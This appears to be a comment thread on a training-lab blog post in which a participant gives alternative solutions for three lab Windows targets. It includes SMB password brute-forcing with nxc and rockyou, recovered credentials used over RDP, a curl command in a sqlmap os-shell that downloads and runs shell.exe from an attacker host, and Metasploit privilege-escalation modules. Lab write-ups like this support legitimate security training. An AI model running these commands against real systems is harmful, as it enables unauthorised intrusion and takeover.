Blog Post
For target 1 there was a much easier way:
just brute-force the password of the administrator and log in as administrator.
┌──(kali㉿iml-kali)-[~/Desktop]
└─$ nxc smb 10.102.139.31 -u administrator -p /usr/share/wordlists/rockyou.txt
SMB 10.102.139.31 445 IML-WIN1018 [*] Windows 10 / Server 2016 Build 17134 x64 (name:IML-WIN1018) (domain:IML-Win1018) (signing:False) (SMBv1:False)
...
SMB 10.102.139.31 445 IML-WIN1018 [+] IML-Win1018\administrator:blink182
Then RDP to the box:
xfreerdp /v:10.102.139.31 /u:administrator /p:blink182 /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kali
So there's no need to use the IMLuser. But I admit that would generate a lot of noise :)
For target 2, in the os-shell of sqlmap you can also use curl to transfer the files:
> curl http://10.102.12.205:8000/shell.exe -o c:\users\iis-admin\shell.exe
> c:\users\iis-admin\shell.exe
And I used the exploit-suggester and the module exploit/windows/local/ms16_075_reflection_juicy to successfully escalate my privileges.
Same for target 3:
create a file with msfvenom and transfer it to the target, and let the exploit-suggester run just to find out that exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move works :)
Nice one, steven. For the brute force, just remember that our rockyou.txt has been truncated to save space. This would not be feasible in real life, but good hack. As for the others, love the usage of Metasploit modules to escalate. Well done!
- steven, 8 days ago
Silver I
Sure, in real life I would not use rockyou but the large password files :)
It's easy to process it in the background while you're looking manually for other ways.